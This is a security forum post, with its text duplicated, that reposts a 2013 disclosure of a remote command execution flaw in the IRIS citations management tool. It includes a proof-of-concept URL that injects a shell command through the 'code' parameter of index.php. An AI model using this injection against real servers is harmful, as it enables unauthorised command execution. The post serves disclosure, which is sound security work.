DarckSol (L1) cache Пользователь Регистрация 17.03.2008 Сообщения 894 Реакции 182 12.02.2013 Добавить закладку #1 IRIS Citations management tool suffers from a remote command execution vulnerability. A vulnerability exists in IRIS citations management tool which allows a low privileged attacker to execute arbitrary commands. Details can be found on my blog: https://infosecabsurdity.wordpress.com/2013...mand-execution/ PoC: http://[target]/[path]/index.php?p=add&import=spnro&code=a"+-T+0.1+||echo+`id`+>+/tmp/luls||" ~ aeon
IRIS Citations management tool suffers from a remote command execution vulnerability. A vulnerability exists in IRIS citations management tool which allows a low privileged attacker to execute arbitrary commands. Details can be found on my blog: https://infosecabsurdity.wordpress.com/2013...mand-execution/ PoC: http://[target]/[path]/index.php?p=add&import=spnro&code=a"+-T+0.1+||echo+`id`+>+/tmp/luls||" ~ aeon
